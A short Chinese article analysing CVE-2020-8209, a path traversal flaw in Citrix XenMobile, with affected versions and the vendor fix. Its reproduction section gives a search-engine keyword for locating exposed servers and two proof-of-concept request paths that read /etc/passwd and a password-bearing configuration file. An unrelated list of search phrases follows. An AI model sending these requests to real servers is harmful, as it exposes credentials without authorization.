XenMobile中CVE-2020-8209漏洞的示例分析
发表于:2025-01-21 作者:千家信息网编辑
千家信息网最后更新 2025年01月21日,这期内容当中小编将会给大家带来有关XenMobile中CVE-2020-8209漏洞的示例分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。1、漏洞介绍XenMob
千家信息网最后更新 2025年01月21日XenMobile中CVE-2020-8209漏洞的示例分析
这期内容当中小编将会给大家带来有关XenMobile中CVE-2020-8209漏洞的示例分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。
1、漏洞介绍
XenMobile是Citrix开发的企业移动性管理软件,该产品允许企业管理员工的移动设备和移动应用程序,该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。CVE-2020-8209,路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件。(该软件国外居多,国内基本很少)
2、漏洞版本
RP2之前的XenMobile服务器10.12
RP4之前的XenMobile服务器10.11
RP6之前的XenMobile服务器10.10
10.9 RP5之前的XenMobile服务器
3、漏洞复现
1.通过空间引擎关键字
"XenMobile控制台"
2.POC验证漏洞
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties
4、漏洞建议
官方补丁删除了/opt/sas/sw/tomcat/inst1/webapps/ROOT/jsp/help-sb-download.jsp
上述就是小编为大家分享的XenMobile中CVE-2020-8209漏洞的示例分析了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注行业资讯频道。
漏洞
分析
服务器
服务
移动
企业
软件
示例
内容
员工
应用程序
文件
程序
设备
应用
管理
安全
中小
企业管理
关键
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
计算机网络安全是啥专业
大学生软件开发什么项目
网络安全 对策
你认为数据库与搜索引擎有何异同
软件开发招聘年龄
游戏服务器管理系统
戴尔服务器可以调试功率大小不
log网络技术
为什么游戏连接不了服务器
网络安全的国际标准
ipad数据库怎么登录
佛山微商软件开发咨询
台州erp软件开发
网络安全扫描开发
偏好数据库
拼多多的软件开发公司
网络安全等级保护验收
大学生网络安全知识调查报告
计算机网络技术人员证书试题
闵行区威力软件开发生产厂家
网络安全专业能进大厂吗
服务器上网用户管理工具
网络安全大家谈直播间
数据库文档生成
软件开发费对应的商品编码
崇明区大型软件开发厂家现货
山东全意顺软件开发有限公司
深圳行业软件开发咨询
outlook无法连接到服务器
企业网络安全教育征文